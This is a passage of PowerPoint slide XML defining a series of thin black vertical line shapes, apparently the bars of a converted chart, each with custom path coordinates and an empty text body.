          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5435378" y="4500239"/>
            <a:ext cx="2517" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="622300">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="621758"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="object 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5465735" y="4559056"/>
            <a:ext cx="0" cy="1174039"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="592455">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="592073"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="object 347"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5465461" y="4560942"/>
            <a:ext cx="0" cy="1171523"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="591185">
                <a:moveTo>
                  <a:pt x="0" y="590850"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="591126"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="object 348"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5493642" y="4574059"/>
            <a:ext cx="0" cy="1158939"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="584835">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="584507"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="object 349"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5493369" y="4573759"/>
            <a:ext cx="2517" cy="1158939"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="584835">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="584658"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="object 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5521494" y="4648585"/>
            <a:ext cx="0" cy="1084697"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="547369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="546898"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="object 351"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5520138" y="4648585"/>
            <a:ext cx="1258" cy="1084697"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="547369">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="546898"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="object 352"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5549400" y="4661444"/>
            <a:ext cx="0" cy="1072113"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="541019">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="540409"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="object 353"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5549128" y="4660351"/>
            <a:ext cx="1258" cy="1072113"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="541019">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="540961"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="object 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5577252" y="4733838"/>
            <a:ext cx="0" cy="999129"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="504189">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="503877"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="object 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574803" y="4734084"/>
            <a:ext cx="2517" cy="999129"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="504189">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="503753"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="object 356"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604613" y="4773552"/>
            <a:ext cx="0" cy="958862"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="483869">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="483831"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="object 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604340" y="4775439"/>
            <a:ext cx="1258" cy="957601"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="483235">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="482884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="object 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5632518" y="4808911"/>
            <a:ext cx="0" cy="923628"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="466089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="465993"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="object 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5632245" y="4809159"/>
            <a:ext cx="2517" cy="923628"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="466089">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="465868"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="object 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5660370" y="4886165"/>
            <a:ext cx="0" cy="846869"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="427355">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="427004"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="object 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5659306" y="4885284"/>
            <a:ext cx="1258" cy="848127"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="427989">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="427453"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="object 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5688276" y="4961239"/>
            <a:ext cx="0" cy="771368"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="389255">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="389119"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="object 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5688002" y="4960359"/>
            <a:ext cx="2517" cy="772626"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="389889">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="389568"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="object 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5716184" y="5019678"/>
            <a:ext cx="0" cy="713484"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="360044">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="359628"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="object 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713980" y="5021825"/>
            <a:ext cx="2517" cy="710967"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="358775">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="358551"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="object 366"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744036" y="5088306"/>
            <a:ext cx="0" cy="644274"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="325119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="325002"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="object 367"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5743764" y="5088306"/>
            <a:ext cx="1258" cy="644274"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="325119">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="325002"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="object 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5771394" y="5160701"/>
            <a:ext cx="0" cy="572549"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="288925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="288470"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="object 369"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5768399" y="5162039"/>
            <a:ext cx="3775" cy="571290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="288289">
                <a:moveTo>
                  <a:pt x="0" y="287518"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="287518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="287794"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="object 370"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5799302" y="5218089"/>
            <a:ext cx="0" cy="514665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="259714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="259505"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="object 371"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5798483" y="5217510"/>
            <a:ext cx="1258" cy="515923"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="260350">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="259802"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="object 372"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5827154" y="5249180"/>
            <a:ext cx="0" cy="483206"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="243839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
